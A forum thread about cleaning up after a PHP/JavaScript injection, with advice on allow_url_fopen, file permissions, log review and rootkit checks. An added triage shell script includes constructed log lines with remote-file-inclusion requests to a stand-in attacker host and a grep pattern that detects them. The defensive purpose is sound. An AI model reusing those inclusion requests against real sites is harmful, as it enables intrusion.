
help finding hacking loopholes


dflow


i was attacked by a redirect php injection

 

my pc is clean of viruses

 

so i figure that either my hosting server was hacked

or that my php was hacked

 

the hack was an injection of some redirect eval(gikljhoihdalnbd) bullshit

 

and an injection into the bottom end of all js files

 

anyone experience this kind of hack before?

and if so what can i do to prevent it?


I'm not sure what you mean by redirect php injection.  I'm also not sure what you mean about your javascript files.  Were they physically changed on the server so that they now include the cracker's bad jscript?

 

The only way to figure out what happened is to analyze the system and the logs. 

 

Is allow_url_fopen = On set in your php.ini? 

 

 


allow_url_fopen = On set in your php.ini?

yes it is on

i found changes in the php files

 

and the javascripts now include a line from the cracker


if physical files on your server have been changed then i would say it's more likely the web server has been compromised than code.

 

i thought maybe i had a virus that attacked my ftp client and uploaded it

got my password etc

but no viruses

 

 


I don't agree at all -- simple code mistakes and permissions issues could explain what happened.  This is why looking at your web logs is important.  Here's my thoughts --

 

1st, turn allow_url_fopen off for now.  What that does is allow you to specify URLs in all sorts of places including requires and includes.  This is referred to as remote execution.  If they can find any script that builds require or include paths in an insecure way, they can trick your server into reading code from their server.  allow_url_fopen will turn this off for now.

 

Secondarily, modify your permissions on the code directories so that they don't allow write for apache.

 

Replace all the original scripts and javascripts and in the meantime start poring over and grepping your logs looking for weird URLs and in particular anything that includes http://notyourserver in URLs. 

 

Also make sure you look in your tmp directory.  Often rootkits will be deposited initially in there.  If you believe there's a chance you were rootkitted, you need to find out asap.  Since they seemed to want to exploit your site and don't mind you knowing it, this might bode well for you, as usually they rootkit in order to turn your server into an ftp repo, spam relay, or shadow website.  They'll often start up connections to an irc server in order to remote control it via an irc channel. 

 

If this is a redhat/centos based server, you have the great tool of rpm to help figure this out: since all the package contents have md5 hashes, you can use rpm to look at the basic packages that a rootkit will screw with, the ones that go after login, ps, sshd, etc.

 

lsof is a great tool, but sometimes that gets rootkitted too. 

 

Again, if it's possible for now, disable php uploads until you figure out what has happened.  Try and lock down the server as much as possible while you're doing this.  Are you running any standard packages (phpBB, wordpress, etc.) on the server, that might be the source of the exploit?  More often than not, exploits are the result of script kiddies who are running an exploit against a particular package.  It's very important to figure this out, and patch any holes, or you'll get exploited again.

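The steps in the post above (and the allow_url_fopen question in the first reply) are easy to script. The following is an added example, not code from the thread or from any of its posters: a small POSIX sh file with three helpers, one that greps access-log lines for a remote URL passed as a query parameter (the "http://notyourserver" pattern, plain and URL-encoded), one that reports the effective allow_url_fopen value from php.ini text, and one that lists PHP/JS files under a web root that the web server's group or anyone can write to. The log lines, the php.ini snippet, the `attacker.invalid` host and the `apache` group name are all constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the thread): triage helpers for a defaced PHP site.
# All sample data below is constructed so the script runs offline.

# Constructed Apache combined-format log lines (not real traffic). Two of them
# pass a remote URL as a query parameter, one plain and one percent-encoded.
SAMPLE_LOG='203.0.113.5 - - [10/Oct/2009:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2009:13:56:01 +0000] "GET /index.php?page=http://attacker.invalid/x.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
203.0.113.9 - - [10/Oct/2009:13:56:02 +0000] "GET /gallery.php?inc=http%3A%2F%2Fattacker.invalid%2Fx.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
198.51.100.2 - - [10/Oct/2009:13:57:10 +0000] "POST /contact.php HTTP/1.1" 302 0 "http://www.example.com/contact.php" "Mozilla/5.0"'

# Print log lines (stdin) whose query string carries a remote URL as a
# parameter value. The referer field is not matched because the pattern
# anchors on "?...=" inside the request.  Usage:
#   find_remote_includes < /var/log/httpd/access_log
find_remote_includes() {
    grep -Ei '\?[^" ]*=(https?|ftp)(://|%3a%2f%2f)'
}

# Count the hits in the constructed sample (expected: 2).
count_remote_includes() {
    printf '%s\n' "$SAMPLE_LOG" | find_remote_includes | wc -l | tr -d ' '
}

# Report the effective allow_url_fopen value from php.ini text on stdin:
# prints On, Off, or unset. Lines commented out with ';' are ignored and,
# as PHP does, the last uncommented setting wins.
check_allow_url_fopen() {
    awk -F= '
        /^[[:space:]]*allow_url_fopen[[:space:]]*=/ {
            val = $2
            sub(/;.*/, "", val)            # drop a trailing comment
            gsub(/[[:space:]]/, "", val)   # drop surrounding whitespace
            result = val; found = 1
        }
        END { print (found ? result : "unset") }'
}

# List .php and .js files under a web root that are world-writable, or
# writable by the web server group (second argument, assumed "apache").
# These are the files the post says Apache should not be able to write.
find_web_writable() {
    root=$1
    group=${2:-apache}
    find "$root" -type f \( -name '*.php' -o -name '*.js' \) \
        \( -perm -002 -o \( -group "$group" -perm -020 \) \) -print
}

# List .php and .js files changed in the last N days (default 7), a quick
# way to spot scripts that were edited without you doing it.
find_recent_changes() {
    find "$1" -type f \( -name '*.php' -o -name '*.js' \) -mtime "-${2:-7}" -print
}

# Stand-alone run against the constructed data; set WEBROOT to scan a real tree.
printf '%s\n' "$SAMPLE_LOG" | find_remote_includes
printf 'allow_url_fopen = On\n' | check_allow_url_fopen
if [ -n "${WEBROOT:-}" ]; then
    find_web_writable "$WEBROOT" "${WEBGROUP:-apache}"
    find_recent_changes "$WEBROOT" 7
fi
```

The log pattern is a heuristic: a legitimate `?redirect=http://...` parameter will also match, so the hits are a list to read, not proof of compromise. Run the file-permission checks as a user that can read the whole document root, and compare the recently-changed list against your last known-good backup rather than trusting the timestamps alone.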

PHP is server side; how can people hack it unless you've got admins of your servers that hate you? Am I correct, broh?

 

No, as I just explained, the most common way people get exploited is via script kiddies who are exploiting a vulnerability in a particular package.  When you have custom software, that requires someone to really do a lot of testing on an app where they don't have the source code.  They can try some things, but they're just guessing. 

 

Compare that with something like phpBB.  There are tens of thousands of sites running phpBB, so if someone finds an exploit in it, and puts it into an exploit script, they can easily use google to identify a long list of potential victims and then let their bot just run through those, letting the exploit kit do the work.  There's absolutely no thought put into it, and they don't know you nor do they care who you are.

 

I have a site for example, that is somewhat old and has a contact form.  Every single day I get emails from this contact form that have a bunch of links in them.  Clearly there is nothing to be gained from someone posting a form with a bunch of links to offshore viagra sites, that will simply be cleaned out by my spam filter.  I continue to receive these because it's a Bot doing the sending that is simply looking for forms and attempting to stick in links and post them.  A simple captcha easily defeats this, but I've been too lazy to add it to the contact form. 

 

With that said, it is in no way personal that spammers continue to send these emails day in and day out.  If they did, they would quickly realize that it is a complete waste of time to post these to a contact form.

 

 


thanks i'll go over my logs

 

i updated avast regarding this exploit so at least now i get an alert

 

the site has been stable for a few days

 

so i did something right

 

changed ftp codes after backup

turned off allow_url_fopen

 

also changed ftp client

 

 
